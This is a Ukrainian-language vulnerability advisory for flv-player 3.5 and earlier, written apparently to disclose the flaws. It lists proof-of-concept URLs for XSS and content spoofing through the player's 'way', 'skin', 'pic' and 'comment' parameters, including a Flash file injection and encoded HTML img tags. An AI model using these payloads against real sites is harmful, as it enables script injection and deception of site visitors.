Уразливості в flv-player
23:58 08.10.201303.08.2013
У травні, 22.05.2013, я виявив Content Spoofing та Cross-Site Scripting уразливості в flv-player. Про що найближчим часом повідомлю розробникам веб додатку.
Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам.
08.10.2013
XSS (через Flash Injection) (WASC-08):
http://site/path/uflvplayer_500x375.swf?way=http://site2/1.flv&skin=xss.swf
В старих версіях флеша атака спрацює з флешкою xss.swf на будь-яких доменах, а в нових версіях - лише на тому самому домені.
Content Spoofing (Flash Injection) (WASC-12):
http://site/path/uflvplayer_500x375.swf?way=http://site2/1.flv&skin=http://site2/1.swf
Content Spoofing (Content Injection) (WASC-12):
http://site/path/uflvplayer_500x375.swf?way=http://site2/1.flv
http://site/path/uflvplayer_500x375.swf?way=http://site2/1.flv&pic=http://site2/1.jpg
Content Spoofing (HTML Injection) (WASC-12):
http://site/path/uflvplayer_500x375.swf?way=http://site&comment=test%3Cimg%20src=%27http://site2/1.jpg%27%3E
XSS (WASC-08):
http://site/path/uflvplayer_500x375.swf?way=http://site&comment=+%3Cimg%20src=%27xss.swf%27%3E
В старих версіях флеша атака спрацює з флешкою xss.swf на будь-яких доменах, а в нових версіях - лише на тому самому домені. Також можлива Strictly social XSS атака.
Уразливі flv-player 3.5 та попередні версії.